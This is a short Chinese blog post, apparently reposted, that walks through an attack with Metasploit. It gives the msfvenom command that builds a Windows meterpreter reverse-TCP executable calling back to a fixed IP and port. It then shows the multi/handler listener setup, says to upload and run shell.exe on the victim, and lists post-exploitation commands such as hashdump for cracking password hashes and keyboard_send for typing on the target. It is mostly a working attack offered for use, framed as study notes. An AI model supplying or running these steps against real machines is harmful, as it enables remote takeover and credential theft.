msfvenom的shell在windows中的使用


msfvenom的shell在windows中的使用

msfvenom生成shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=123.123.123.123 lport=2222 -f exe >/root/shell.exe

輸入命令:

msfconsole

metasploit偵聽

復制代碼
msf > use exploit/multi/handler     #加載模塊
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp    #設置payload
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 上面的ip   #設置kali的ip
lhost => 123.123.123.123
msf exploit(multi/handler) > set lport 上面的端口   #設置kali的端口
lport => 2222
msf exploit(multi/handler) > exploit   #執行
[*] Started reverse TCP handler on 123.123.123.123:2222 
復制代碼

將生成的shell上傳至windows主機中並運行

提示有返回即可控制對方電腦,如同操作linux服務器一樣

 kill 后面跟shell端的進程id,如果加-s會結束該會話的進程

 ifconfig和ipconfig 看ip

sysinfo 看系統信息

 

 ps 看進程(能看到shell.exe進程)

 

 hashdump 可以dump出賬號口令的hash字段,拿去cmd5解,這里是為空

 keyboard_send ****  發送字符串到目標機

 

 

 

 

參考:

metasploit、msfvenom生成木馬入侵電腦及手機 - 秋夜雨巷 - 博客園 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM